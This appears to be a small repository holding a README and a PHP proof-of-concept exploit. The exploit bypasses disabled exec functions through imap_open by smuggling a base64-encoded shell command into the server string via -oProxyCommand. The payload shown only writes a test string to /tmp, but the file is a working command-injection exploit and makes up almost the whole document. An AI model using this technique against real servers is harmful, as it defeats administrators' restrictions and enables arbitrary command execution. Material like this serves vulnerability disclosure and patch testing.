├── README.md
└── exploit.php


/README.md:
--------------------------------------------------------------------------------
1 | # PHP_imap_open_exploit
2 | Bypassing disabled exec functions in PHP via imap_open (Debian & Ubuntu)
3 | 
4 | Original report by CRLF:
5 | https://bugs.php.net/bug.php?id=76428
6 | 


--------------------------------------------------------------------------------
/exploit.php:
--------------------------------------------------------------------------------
1 | <?php
2 | # CRLF (c)
3 | # echo '1234567890'>/tmp/test0001
4 | 
5 | $server = "x -oProxyCommand=echo\tZWNobyAnMTIzNDU2Nzg5MCc+L3RtcC90ZXN0MDAwMQo=|base64\t-d|sh}";
6 | 
7 | imap_open('{'.$server.':143/imap}INBOX', '', '') or die("\n\nError: ".imap_last_error());
8 | 


--------------------------------------------------------------------------------